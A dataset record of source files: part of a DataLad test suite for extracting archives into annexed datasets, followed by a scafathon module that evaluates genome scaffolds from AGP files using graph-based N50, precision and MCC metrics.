f.txt': '1 f load1'\n }}),\n ('2u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load2'\n }}),\n ('3u', { 
# updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load3'\n }}),\n ('4u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load4'\n }}),\n ('d1', (('1.tar.gz', (\n ('2 f.txt', '2 f load'),\n ('d2', (\n ('2d', ''),)\n )),),),),\n )\n)\n\ntree4uargs = dict(\n tree=(\n ('4u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load4',\n 'sub.tar.gz': {\n '2 f.txt': '2 f'\n }\n }}),\n )\n)\n\n\n@xfail_buggy_annex_info\n@known_failure_windows\n# apparently fails only sometimes in PY3, but in a way that's common in V6\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree1args)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_content(path_orig=None, url=None, repo_path=None):\n with chpwd(repo_path):\n # TODO we need to be able to pass path into add_archive_content\n # We could mock but I mean for the API\n\n # no repo yet\n assert_raises(NoDatasetFound, add_archive_content, \"nonexisting.tar.gz\")\n ds = Dataset(repo_path).create()\n res = ds.add_archive_content(\"nonexisting.tar.gz\", on_failure='ignore')\n assert_in_results(res, action='add-archive-content',\n status='impossible')\n repo = ds.repo\n\n # we can't add a file from outside the repo ATM\n res = ds.add_archive_content(Path(path_orig) / '1.tar.gz',\n on_failure='ignore')\n assert_in_results(\n res,\n action='add-archive-content',\n status='impossible',\n type=\"dataset\",\n message=\"Can not add archive outside of the dataset\"\n )\n\n # Let's add first archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n for s in range(1, 5):\n repo.add_url_to_file('%du/1.tar.gz' % s,\n opj(url, '%du/1.tar.gz' % s))\n repo.commit(\"added 1.tar.gz\")\n\n key_1tar = repo.get_file_annexinfo('1.tar.gz')['key'] # will be used in the test later\n\n def d1_basic_checks():\n ok_(exists('1'))\n ok_file_under_git('1', '1 f.txt', annexed=True)\n ok_file_under_git(opj('1', 'd', '1d'), annexed=True)\n ok_archives_caches(repo_path, 0)\n\n # and by default it just does it, everything goes to annex\n res = add_archive_content('1.tar.gz')\n assert_in_results(\n res,\n action='add-archive-content',\n status='ok'\n )\n d1_basic_checks()\n\n # If ran again, should proceed just fine since the content is the same\n # so no changes would be made really\n res = add_archive_content('1.tar.gz')\n assert_in_results(\n res,\n action='add-archive-content',\n status='ok'\n )\n\n # But that other one carries updated file, so should fail due to\n # overwrite\n res = add_archive_content(Path('1u') / '1.tar.gz',\n use_current_dir=True, on_failure='ignore')\n assert_in_results(\n res,\n action='add-archive-content',\n status='error',\n )\n assert_in('exists, but would be overwritten by new file',\n res[0]['message'])\n # but should do fine if overrides are allowed\n add_archive_content(Path('1u') / '1.tar.gz', existing='overwrite',\n use_current_dir=True)\n add_archive_content(Path('2u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n add_archive_content(Path('3u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n add_archive_content(Path('4u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n\n # rudimentary test\n assert_equal(sorted(map(basename, glob(opj(repo_path, '1', '1*')))),\n ['1 f-1.1.txt', '1 f-1.2.txt', '1 f-1.txt', '1 f.txt'])\n whereis = repo.whereis(glob(opj(repo_path, '1', '1*')))\n # they all must be the same\n assert(all([x == whereis[0] for x in whereis[1:]]))\n\n # and we should be able to 
reference it while under subdirectory\n subdir = opj(repo_path, 'subdir')\n with chpwd(subdir, mkdir=True):\n add_archive_content(opj(pardir, '1.tar.gz'), dataset=ds.path,\n use_current_dir=True)\n d1_basic_checks()\n # or we could keep relative path and also demand to keep the archive prefix\n # while extracting under original (annex root) dir\n add_archive_content(opj(pardir, '1.tar.gz'),\n dataset=ds.path,\n add_archive_leading_dir=True)\n\n with chpwd(opj(repo_path, '1')):\n d1_basic_checks()\n\n with chpwd(repo_path):\n # test with excludes and renames and annex options\n ds.add_archive_content(\n '1.tar.gz', exclude=['d'], rename=['/ /_', '/^1/2'],\n annex_options=\"-c annex.largefiles=exclude=*.txt\",\n delete=True)\n # no conflicts since new name\n ok_file_under_git('2', '1_f.txt', annexed=False)\n assert_false(exists(opj('2', 'd')))\n assert_false(exists('1.tar.gz')) # delete was in effect\n\n # now test ability to extract within subdir\n with chpwd(opj(repo_path, 'd1'), mkdir=True):\n # Let's add first archive to the repo so we could test\n # named the same way but different content\n with swallow_outputs():\n repo.add_url_to_file('d1/1.tar.gz', opj(url, 'd1', '1.tar.gz'))\n repo.commit(\"added 1.tar.gz in d1\")\n\n def d2_basic_checks():\n ok_(exists('1'))\n ok_file_under_git('1', '2 f.txt', annexed=True)\n ok_file_under_git(opj('1', 'd2', '2d'), annexed=True)\n ok_archives_caches(repo.path, 0)\n add_archive_content('1.tar.gz', dataset=ds.path)\n d2_basic_checks()\n\n # in manual tests ran into the situation of inability to obtain on a single run\n # a file from an archive which was coming from a dropped key. I thought it was\n # tested in custom remote tests, but I guess not sufficiently well enough\n repo.drop(opj('1', '1 f.txt')) # should be all kosher\n repo.get(opj('1', '1 f.txt'))\n ok_archives_caches(repo.path, 1, persistent=True)\n ok_archives_caches(repo.path, 0, persistent=False)\n\n repo.drop(opj('1', '1 f.txt')) # should be all kosher\n repo.drop(key_1tar, key=True) # is available from the URL -- should be kosher\n repo.get(opj('1', '1 f.txt')) # that what managed to not work\n\n # TODO: check if persistent archive is there for the 1.tar.gz\n\n # We should be able to drop everything since available online\n with swallow_outputs():\n clean(dataset=ds)\n repo.drop(key_1tar, key=True) # is available from the URL -- should be kosher\n\n ds.drop(opj('1', '1 f.txt')) # should be all kosher\n ds.get(opj('1', '1 f.txt')) # and should be able to get it again\n\n # bug was that dropping didn't work since archive was dropped first\n repo.call_annex([\"drop\", \"--all\"])\n\n # verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! 
;)\n repo.get(key_1tar, key=True)\n unlink(opj(path_orig, '1.tar.gz'))\n with assert_raises(CommandError) as e:\n repo.drop(key_1tar, key=True)\n assert_equal(e.kwargs['stdout_json'][0]['success'], False)\n assert_result_values_cond(\n e.kwargs['stdout_json'], 'note',\n lambda x: '(Use --force to override this check, or adjust numcopies.)' in x\n )\n assert exists(opj(repo.path, repo.get_contentlocation(key_1tar)))\n\n\n@integration\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree1args)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_content_strip_leading(path_orig=None, url=None, repo_path=None):\n with chpwd(repo_path):\n ds = Dataset(repo_path).create(force=True)\n repo = ds.repo\n # Let's add first archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n repo.commit(\"added 1.tar.gz\")\n\n add_archive_content('1.tar.gz', strip_leading_dirs=True)\n ok_(not exists('1'))\n ok_file_under_git(ds.path, '1 f.txt', annexed=True)\n ok_file_under_git('d', '1d', annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(tree={\"1.zip\": {\"dir\": {\"bar\": \"blah\"}, \"foo\": \"blahhhhh\"}})\ndef test_add_archive_content_zip(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n with swallow_outputs():\n ds.save(\"1.zip\", message=\"add 1.zip\")\n add_archive_content(\"1.zip\")\n ok_file_under_git(ds.pathobj / \"1\" / \"foo\", annexed=True)\n ok_file_under_git(ds.pathobj / \"1\" / \"dir\" / \"bar\", annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@with_tree(tree={\"ds\": {\"1.tar.gz\": {\"foo\": \"abc\"}},\n \"notds\": {\"2.tar.gz\": {\"bar\": \"def\"}}})\ndef test_add_archive_content_absolute_path(path=None):\n ds = Dataset(opj(path, \"ds\")).create(force=True)\n repo = ds.repo\n ds.save(\"1.tar.gz\", message=\"1.tar.gz\")\n abs_tar_gz = opj(path, \"ds\", \"1.tar.gz\")\n add_archive_content(abs_tar_gz, dataset=ds)\n ok_file_under_git(opj(path, \"ds\", \"1\", \"foo\"), annexed=True)\n commit_msg = repo.format_commit(\"%B\")\n # The commit message uses relative paths.\n assert_not_in(abs_tar_gz, commit_msg)\n assert_in(\"1.tar.gz\", commit_msg)\n res = add_archive_content(opj(path, \"notds\", \"2.tar.gz\"),\n dataset=ds, on_failure='ignore')\n\n assert_in_results(\n res,\n action='add-archive-content',\n status='impossible',\n message='Can not add archive outside of the dataset',\n )\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree4uargs)\ndef test_add_archive_use_archive_dir(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n # Let's add first archive to the repo with default setting\n archive_path = opj('4u', '1.tar.gz')\n # check it gives informative error if archive is not already added\n res = add_archive_content(archive_path, on_failure='ignore')\n message = \\\n \"Can not add an untracked archive. Run 'datalad save 4u\\\\1.tar.gz'\"\\\n if on_windows else \\\n \"Can not add an untracked archive. 
Run 'datalad save 4u/1.tar.gz'\"\n assert_in_results(\n res,\n action='add-archive-content',\n message=message,\n status='impossible')\n\n with swallow_outputs():\n ds.save(archive_path)\n\n ok_archives_caches(ds.path, 0)\n add_archive_content(archive_path, strip_leading_dirs=True,\n use_current_dir=True)\n ok_(not exists(opj('4u', '1 f.txt')))\n ok_file_under_git(ds.path, '1 f.txt', annexed=True)\n ok_archives_caches(ds.path, 0)\n\n # and now let's extract under archive dir\n add_archive_content(archive_path, strip_leading_dirs=True)\n ok_file_under_git(ds.path, opj('4u', '1 f.txt'), annexed=True)\n ok_archives_caches(ds.path, 0)\n\n add_archive_content(opj('4u', 'sub.tar.gz'))\n ok_file_under_git(ds.path, opj('4u', 'sub', '2 f.txt'), annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@with_tree(\n tree={\n 'archives': {\n '1.gz': '1',\n '2.xz': '2',\n '3.lzma': '3',\n # TODO: add any other stream compression we might be supporting via 7zip or patool?\n },\n }\n)\ndef test_add_archive_single_file(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n archives = glob('archives/*')\n ds.save(archives, message='Added archives')\n\n for archive in archives:\n archive_name = os.path.splitext(archive)[0]\n archive_content = os.path.basename(archive_name)\n ds.add_archive_content(archive)\n ok_file_has_content(archive_name, archive_content)\n\n\nclass TestAddArchiveOptions():\n # few tests bundled with a common setup/teardown to minimize boiler plate\n # nothing here works on windows, no even teardown(), prevent failure at the\n # origin\n def setup(self):\n repo_path = tempfile.mkdtemp(**get_tempfile_kwargs(prefix=\"tree\"))\n create_tree(\n repo_path,\n {'1.tar': {'file.txt': 'load',\n '1.dat': 'load2'}})\n self.ds = ds = Dataset(repo_path)\n ds.create(force=True)\n self.annex = ds.repo\n # Let's add first archive to the annex so we could test\n ds.save('1.tar', message=\"added 1.tar\")\n\n def teardown(self):\n # so we close any outstanding batch process etc\n self.annex.precommit()\n rmtemp(self.ds.path)\n\n def test_add_delete(self):\n # To test that .tar gets removed\n self.ds.add_archive_content('1.tar', strip_leading_dirs=True,\n delete=True)\n assert_false(lexists(self.ds.pathobj / '1.tar'))\n\n # git-annex regression\n # https://git-annex.branchable.com/bugs/regression__58___annex_add_of_moved_file_errors_out/\n @skip_if(\n '10.20220525' <= external_versions['cmd:annex'] < '10.20220706', # approx when was fixed\n msg=\"buggy git-annex release\"\n )\n def test_add_archive_leading_dir(self):\n import os\n os.mkdir(self.ds.pathobj / 'sub')\n f123 = Path('sub') / '123.tar'\n Path(self.ds.pathobj / '1.tar').rename(self.ds.pathobj / Path(f123))\n self.annex.remove('1.tar', force=True)\n self.ds.save(message=\"renamed\")\n\n self.ds.add_archive_content(\n f123,\n add_archive_leading_dir=True,\n strip_leading_dirs=True\n )\n\n ok_file_under_git(self.ds.path,\n str(Path('sub') / '123' / 'file.txt'),\n annexed=True)\n\n # https://github.com/datalad/datalad/issues/6187\n @skip_if_adjusted_branch\n def test_add_delete_after_and_drop(self):\n # To test that .tar gets removed\n # but that new stuff was added to annex repo. 
We know the key since\n # default backend and content remain the same\n key1 = 'MD5E-s5--db87ebcba59a8c9f34b68e713c08a718.dat'\n repo = self.ds.repo\n # previous state of things:\n prev_files = list(find_files('.*', self.ds.path))\n assert_equal(repo.whereis(key1, key=True, output='full'), {})\n\n commits_prior = list(repo.get_branch_commits_('git-annex'))\n self.ds.add_archive_content('1.tar',\n strip_leading_dirs=True, delete_after=True)\n commits_after = list(repo.get_branch_commits_('git-annex'))\n # There should be a single commit for all additions +1 to initiate\n # datalad-archives gh-1258\n # If faking dates, there should be another +1 because\n # annex.alwayscommit isn't set to false.\n assert_equal(len(commits_after),\n # We expect one more when faking dates because\n # annex.alwayscommit isn't set to false.\n len(commits_prior) + 2 + repo.fake_dates_enabled)\n assert_equal(prev_files, list(find_files('.*', self.ds.path)))\n w = repo.whereis(key1, key=True, output='full')\n assert_equal(len(w), 2) # in archive, and locally since we didn't drop\n\n # Let's now do the same but also drop content\n self.ds.add_archive_content('1.tar',\n strip_leading_dirs=True, delete_after=True,\n drop_after=True)\n assert_equal(prev_files, list(find_files('.*', self.ds.path)))\n w = repo.whereis(key1, key=True, output='full')\n assert_equal(len(w), 1) # in archive\n\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n def test_add_delete_after_and_drop_subdir(self=None):\n os.mkdir(opj(self.annex.path, 'subdir'))\n mv_out = self.annex.call_git(\n ['mv', '1.tar', 'subdir']\n )\n self.annex.commit(\"moved into subdir\")\n with chpwd(self.annex.path):\n # was failing since deleting without considering if tarball\n # was extracted in that tarball directory\n commits_prior_master = list(self.annex.get_branch_commits_())\n commits_prior = list(self.annex.get_branch_commits_('git-annex'))\n add_out = self.ds.add_archive_content(\n opj('subdir', '1.tar'),\n delete_after=True,\n drop_after=True)\n assert_repo_status(self.annex.path)\n if not self.annex.is_managed_branch():\n # whole counting logic here is ignorant of adjusted branches\n commits_after_master = list(self.annex.get_branch_commits_())\n commits_after = list(self.annex.get_branch_commits_('git-annex'))\n # There should be a single commit for all additions +1 to\n # initiate datalad-archives gh-1258. 
If faking dates,\n # there should be another +1 because annex.alwayscommit\n # isn't set to false.\n assert_equal(len(commits_after),\n len(commits_prior) + 2 + self.annex.fake_dates_enabled)\n assert_equal(len(commits_after_master), len(commits_prior_master))\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n # and if we add some untracked file, redo, there should be no changes\n # to master and file should remain not committed\n create_tree(self.annex.path, {'dummy.txt': '123'})\n assert_true(self.annex.dirty) # untracked file\n add_out = add_archive_content(\n opj('subdir', '1.tar'),\n delete_after=True,\n drop_after=True,\n allow_dirty=True)\n assert_repo_status(self.annex.path, untracked=['dummy.txt'])\n assert_equal(len(list(self.annex.get_branch_commits_())),\n len(commits_prior_master))\n\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n def assert_no_trash_left_behind(self):\n assert_equal(\n list(find_files(r'\\.datalad..*', self.annex.path, exclude=\"config\",\n dirs=True)),\n []\n )\n\n @xfail_buggy_annex_info\n def test_override_existing_under_git(self):\n create_tree(self.ds.path, {'1.dat': 'load2'})\n self.ds.save('1.dat', to_git=True, message='added to git')\n self.ds.add_archive_content(\n '1.tar', strip_leading_dirs=True,\n )\n # and we did not bother adding it to annex (for now) -- just skipped\n # since we have it and it is the same\n ok_file_under_git(self.ds.path, '1.dat', annexed=False)\n\n # but if we say 'overwrite' -- we would remove and replace\n self.ds.add_archive_content(\n '1.tar', strip_leading_dirs=True, delete=True\n , existing='overwrite'\n )\n ok_file_under_git(self.ds.path, '1.dat', annexed=True)\n" } ]
390
jim-bo/scafathon
https://github.com/jim-bo/scafathon
313b35b1d36ec5623f931f9e74f34745f428e040
9e5e059ee9ae74a2d16dc8b9356cf6e2bb8472fe
6a33f68ca49d7c3ff95aadabd2b9fb7980fd950a
refs/heads/master
2021-01-01T16:25:00.712869
2014-02-25T17:33:59
2014-02-25T17:33:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5037604570388794, "alphanum_fraction": 0.5210442543029785, "avg_line_length": 23.13263511657715, "blob_id": "ff878cc9510ef048b68b1a742c6a9967b68a4f8b", "content_id": "11be2c7d435fa5f3cdd2beda3049169f4b149460", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13828, "license_type": "permissive", "max_line_length": 117, "num_lines": 573, "path": "/utils/eval.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport math\nimport numpy as np\nimport logging\nimport subprocess\nimport networkx as nx\n\n### definitions ###\nagp_dt = np.dtype([\\\n ('scaf_name', 'S255'),\\\n ('scaf_start', np.long),\\\n ('scaf_stop', np.long),\\\n ('scaf_idx', np.long),\\\n ('comp_type', 'S50'),\\\n ('comp_name', 'S255'),\\\n ('comp_start', np.long),\\\n ('comp_stop', np.long),\\\n ('comp_orien', np.long),\\\n ('comp_linkage', np.long),\\\n])\n\n### private functions ###\n\ndef _load_agp(fpath):\n ''' read agp file into array.'''\n\n # read in agp.\n fin = open(fpath, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n # count number of lines minus comments.\n cnt = 0\n for line in lines:\n if line[0] != \"#\" and len(line) != 0 and line.strip().split()[0] != \"RUNTIME:\":\n cnt += 1\n\n # instantiate array.\n agp_edges = np.zeros(cnt, dtype=agp_dt)\n\n # parse agp.\n idx = 0\n for line in lines:\n # tokenize.\n if line[0] == \"#\": continue\n tmp = line.strip().split()\n if len(tmp) == 0: continue\n if tmp[0] == \"RUNTIME:\": continue\n\n # get general tokenize.\n agp_edges[idx]['scaf_name'] = tmp[0]\n agp_edges[idx]['scaf_start'] = int(float(tmp[1]))\n agp_edges[idx]['scaf_stop'] = int(float(tmp[2]))\n agp_edges[idx]['scaf_idx'] = int(float(tmp[3]))\n agp_edges[idx]['comp_type'] = tmp[4]\n\n # contig.\n if tmp[4] == \"W\":\n # get parts.\n agp_edges[idx]['comp_name'] = tmp[5]\n agp_edges[idx]['comp_start'] = int(tmp[6])\n agp_edges[idx]['comp_stop'] = int(tmp[7])\n if tmp[8] == \"+\":\n agp_edges[idx]['comp_orien'] = 0\n else:\n agp_edges[idx]['comp_orien'] = 1\n\n else:\n\n # save entry.\n agp_edges[idx]['comp_name'] = tmp[6]\n agp_edges[idx]['comp_start'] = 1\n agp_edges[idx]['comp_stop'] = int(tmp[5])\n if tmp[7] != \"yes\":\n agp_edges[idx]['comp_linkage'] = 0\n else:\n agp_edges[idx]['comp_linkage'] = 1\n\n\n # update index.\n idx += 1\n\n # shirnk array.\n agp_edges.resize(idx)\n\n return agp_edges\n\ndef _agp_graph(fpath, RG=None):\n ''' returns agp graph '''\n\n # load agp array.\n agp_edges = _load_agp(fpath)\n\n # make digraph.\n G = nx.DiGraph()\n\n # add nodes.\n for i in range(agp_edges.size):\n\n # skip contigs themselves.\n if agp_edges[i]['comp_type'] != 'W': continue\n\n # add node info.\n name = agp_edges[i]['comp_name']\n width = agp_edges[i]['comp_stop']\n orien = agp_edges[i]['comp_orien']\n start = agp_edges[i]['scaf_start']\n stop = agp_edges[i]['scaf_stop']\n scaf = agp_edges[i]['scaf_name']\n G.add_node(agp_edges[i]['comp_name'], {'width':width, 'orien':orien, 'start':start, 'stop':stop,'scaf':scaf})\n\n # add edges.\n for i in range(agp_edges.size):\n\n # skip contigs themselves.\n if agp_edges[i]['comp_type'] != 'N': continue\n if i == agp_edges.shape[0] - 1: continue\n\n # add sorted edges.\n ctg1 = agp_edges[i-1]['comp_name']\n ctg2 = agp_edges[i+1]['comp_name']\n gap = agp_edges[i]['comp_stop']\n\n G.add_edge(ctg1, ctg2, {'gap':gap})\n\n # if RG is supplied ensure all contigs exist.\n if RG != None:\n for n in RG.nodes():\n if G.has_node(n) == False:\n 
G.add_node(n, RG.node[n])\n\n # done.\n return G\n\ndef _uconn_N50(RG, TG):\n \"\"\" calcultes UCONN N50s\"\"\"\n\n # flip TG to be most consistent with RG.\n TG = _dag_flip(RG, TG)\n\n # calculate teh TPN50\n min_size = 1\n WG_REFN50 = _calculate_n50(RG, gap=True, min_size=min_size)\n NG_REFN50 = _calculate_n50(RG, gap=False, min_size=min_size)\n\n # calculate reported n50\n WG_N50 = _calculate_n50(TG, gap=True, min_size=min_size)\n NG_N50 = _calculate_n50(TG, gap=False, min_size=min_size)\n\n # remove edges not in TG.\n TG = _remove_difference(RG, TG)\n\n # calculate teh TPN50\n WG_TPN50 = _calculate_n50(TG, gap=True, min_size=min_size)\n NG_TPN50 = _calculate_n50(TG, gap=False, min_size=min_size)\n\n # yield results.\n return WG_N50, WG_TPN50, TG\n\ndef _compute_formula(true_adj, test_adj, n):\n ''' computes statistics when TG is already oriented. This\n method computes A and B exactly, but uses formulas\n to find C and D.'''\n\n # set vars.\n m = len(true_adj)\n N = n * (n-1)\n\n # compute the A statistic set.\n A = true_adj.intersection(test_adj)\n\n # compute the B statistic set.\n B = test_adj.difference(true_adj)\n\n # compute the C statistic set.\n C = m - len(A)\n\n # compute the D statistic set.\n D = N - m - len(B)\n\n # return categories.\n return len(A), len(B), C, D, A\n\n\ndef _gap_deviation(RG, TG):\n ''' calculate MAPE '''\n\n # find true edges.\n radj = set(RG.edges())\n tadj = set(TG.edges())\n edges = tadj.intersection(radj)\n\n # calculate MAPE.\n s = 0.0\n for e0, e1 in edges:\n At = RG[e0][e1]['gap']\n Ft = TG[e0][e1]['gap']\n if At != 0.0:\n s += abs(float(At - Ft) / float(At))\n\n # return it.\n try:\n return (100.0 / float(len(edges))) * s\n except:\n return -1.0\n\ndef _get_runtime(agp_file):\n\n # read in agp.\n fin = open(agp_file, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n if len(lines) == 0:\n return -1.0\n\n if lines[-1].count(\"RUNTIME\") == 0:\n return -1.0\n\n # parse last line.\n tmp = lines[-1].strip().split()\n\n return float(tmp[1])\n\n\ndef _sanity_check(RG, TG, A, B, C, D):\n ''' make sure these parameter make sense '''\n\n # set vars.\n n = RG.number_of_nodes()\n m = RG.number_of_edges()\n N = n * (n-1)\n\n # run check 1: m = A + C.\n check1 = m == A + C\n\n # run check 2: N - m = B + D.\n check2 = N - m == B + D\n\n # run report.\n fail = False\n\n if check1 == False:\n logging.error(\"failed check 1: m = A + C, %i = %i + %i: %i\" % (m, A, C, m == A + C))\n fail = True\n\n if check2 == False:\n logging.error(\"failed check 2: N-m = B + D, %i - %i = %i + %i: %i\" % (N, m, B, D, N-m==B+D))\n fail = True\n\n if fail == True:\n sys.exit()\n\n\ndef _dag_flip(RG, TG):\n ''' flip to make most consistant '''\n\n # check it.\n _graph_check(RG)\n _graph_check(TG)\n\n # make set of reference.\n rset = set(RG.edges())\n\n # loop over each component.\n NG = nx.DiGraph()\n for comp in nx.weakly_connected_components(TG):\n\n # turn to subgraph.\n subg = TG.subgraph(comp)\n\n # make sets.\n tset1 = set(subg.edges())\n tset2 = set([(e1, e0) for e0, e1 in tset1])\n\n # check version.\n s1 = len(rset.intersection(tset1))\n s2 = len(rset.intersection(tset2))\n\n # add to nodes to new graph.\n for n in subg.nodes():\n NG.add_node(n, subg.node[n])\n\n # add the best matching orientation.\n for e0, e1 in subg.edges():\n if s1 >= s2:\n NG.add_edge(e0, e1, subg[e0][e1])\n else:\n NG.add_edge(e1, e0, subg[e0][e1])\n\n # return it.\n return NG\n\ndef _graph_check(G):\n ''' makes sure its linear and a DAG '''\n\n # path check.\n for n in G.nodes():\n if 
G.number_of_edges(n) > 2:\n logging.error(\"bad scaffold graph 1 \")\n sys.exit(1)\n\n # DAG check.\n if nx.is_directed_acyclic_graph(G) == False:\n logging.error(\"bad scaffold graph 2\")\n sys.exit(1)\n\ndef _calculate_n50(G, min_size=False, gap=False):\n ''' calculates scaffold N50 given scaffold graph'''\n\n # compute the scaffold sizes.\n sizes = _calc_sizes(G, min_size,gap)\n\n # calculate n50.\n sizes.sort(reverse = True)\n s = sum(sizes)\n limit = s * 0.5\n for l in sizes:\n s -= l\n if s <= limit:\n return int(l)\n \ndef _fasta_n50(fasta_file, min_size=False, gap=False):\n ''' calculates scaffold N50 given fasta file'''\n\n # load fasta.\n seqs = _load_fasta(fasta_file)\n\n # compute the scaffold sizes.\n sizes = [len(seqs[x]) for x in seqs]\n\n # calculate n50.\n sizes.sort(reverse = True)\n s = sum(sizes)\n limit = s * 0.5\n for l in sizes:\n s -= l\n if s <= limit:\n return int(l)\n\n\ndef _calc_sizes(G, min_size, gap, scaf_only=False):\n sizes = list()\n for comp in nx.weakly_connected_components(G):\n\n # skip non scaffolds.\n if scaf_only == True:\n if len(comp) < 2:\n continue\n\n # add contig size.\n size = 0\n for n in comp:\n size += G.node[n]['width']\n\n # add gap size.\n if gap != False:\n for p,q in G.edges(comp):\n size += G[p][q]['gap']\n\n # skip this.\n if min_size != False and size < min_size:\n continue\n\n # save the size.\n sizes.append(size)\n return sizes\n\n\ndef _calc_counts(G, min_size, gap, scaf_only=False):\n sizes = list()\n for comp in nx.weakly_connected_components(G):\n\n # skip non scaffolds.\n if scaf_only == True:\n if len(comp) < 2:\n continue\n\n # add contig size.\n size = 0\n for n in comp:\n size += G.node[n]['width']\n\n # add gap size.\n if gap != False:\n for p,q in G.edges(comp):\n size += G[p][q]['gap']\n\n # skip this.\n if min_size != False and size < min_size:\n continue\n\n # save the size.\n sizes.append(len(comp))\n\n return sizes\n\ndef _remove_difference(RG, TG):\n ''' removes edges not in RG'''\n\n # make edge sets.\n rset = set(RG.edges())\n tset = set(TG.edges())\n\n # identify edges in test that shouldn't be there\n to_remove = tset.difference(rset)\n\n # remove them.\n TG.remove_edges_from(to_remove)\n\n # return modified graph.\n return TG\n\ndef _load_fasta(file_path):\n ''' loads fasta file into dictionary'''\n\n # read file into memory.\n fin = open(file_path)\n lines = fin.readlines()\n fin.close()\n\n # build dictionary.\n data = dict()\n seq = \"\"\n for line in lines:\n\n # Skip blanks.\n if len(line) < 2: continue\n if line[0] == \"#\": continue\n\n # remove blanks.\n line = line.strip()\n\n # Check for ids.\n if line.count(\">\") > 0:\n\n # Check if ending seq.\n if len(seq) > 0:\n\n # save.\n data[head] = seq.upper()\n\n # reset head.\n head = line.replace(\">\",\"\")\n seq = \"\"\n\n # skip to next line.\n continue\n\n # Filter chars.\n seq += line\n\n # save the last one.\n data[head] = seq.upper()\n\n # return dictionary.\n return data\n\n### public functions ###\n\ndef simulation_evaluation(ref_fasta, ctg_fasta, scf_fasta, ref_agp, scf_agp):\n \"\"\" evaluates the simulated dataset \"\"\"\n\n # load the reference and test graph from AGP files.\n RG = _agp_graph(ref_agp)\n TG = _agp_graph(scf_agp, RG=RG)\n\n # calculate referece and ctg n50/\n ref_N50 = _fasta_n50(ref_fasta, gap=True)\n ctg_N50 = _fasta_n50(ctg_fasta, gap=True)\n scf_N50 = _fasta_n50(scf_fasta, gap=True)\n\n # ensure we have all contigs accounted for.\n assert set(TG.nodes()) == set(RG.nodes()),\\\n 'not all contigs accounted for'\n\n # 
compute the exact N50\n scf_N50_2, tp_N50, LG = _uconn_N50(RG, TG)\n\n # make edge sets.\n radj = set(RG.edges())\n tadj = set(TG.edges())\n\n # calculate 4 parameters.\n n = RG.number_of_nodes()\n A, B, C, D, A_SET = _compute_formula(radj, tadj, n)\n\n # compute derivativ stats.\n sensitivity = (100*(float(A) / float(A+C)))\n ppv = (100*(float(A) / float(A+B)))\n if float(math.sqrt((A+B)*(A+C)*(D+B)*(D+C))) != 0.0:\n mcc = (100*(float((A*D)-(B*C)) / float(math.sqrt((A+B)*(A+C)*(D+B)*(D+C)))))\n else:\n mcc = 0.0\n\n # get gap deviation.\n gap_dev = _gap_deviation(RG, TG)\n\n # get the runtime.\n runtime = _get_runtime(scf_agp)\n\n # print results.\n # A B C D gapMape runtime sensitivity ppv mcc REFN50 TPN50 REPN50\n return A, B, C, D, ppv, mcc, gap_dev, runtime, ref_N50, ctg_N50, scf_N50, tp_N50\n\n\n\ndef quast_evaluation(ref, ctgs, scf, sdir, threads):\n\n # note that we are running it.\n logging.info(\"running quast %s %s %s\" % (ref, ctgs, scf))\n\n # run the comparison script.\n x = ref.split(\"/\")\n #z = '/'.join(x[0:-1] + [\"genes.gff\"])\n\n cmd = [\\\n 'python',\\\n '/opt/quast/quast.py',\\\n \"-e\",\n \"-f\",\n # \"-G\", z,\\\n \"-o\", \"./\",\\\n \"-R\", ref,\\\n \"-T\", str(threads),\\\n scf\\\n ]\n\n '''\n # remove dir.\n if os.path.isdir(sdir) == True:\n subprocess.call([\"rm\", \"-rf\", sdir])\n\n # make dir.\n if os.path.isdir(sdir) == False:\n subprocess.call(['mkdir', '-p', sdir])\n\n # make log file.\n lfile = \"%s/log.txt\" % sdir\n\n # capture output.\n with open(lfile, 'w') as fout:\n #if subprocess.call(cmd, stdout=fout, stderr=fout, cwd=sdir) != 0:\n if subprocess.call(cmd, cwd=sdir) != 0:\n logging.error('error running quast')\n return -1, -1\n '''\n # open the output.\n with open(\"%s/report.tsv\" % sdir) as fin:\n results = fin.readlines()\n tmp = list()\n for result in results:\n tmp.append(result.strip())\n results = tmp\n\n # extract results.\n lbls = list()\n res1 = list()\n res2 = list()\n cnt = 0\n for x in results:\n tmp = x.split(\"\\t\")\n lbls.append(tmp[0])\n res1.append(tmp[1])\n #res2.append(tmp[2])\n res2.append(\"\")\n #print cnt, tmp\n cnt += 1\n\n res = np.array([lbls,res1,res2])\n\n return res\n" }, { "alpha_fraction": 0.6042157411575317, "alphanum_fraction": 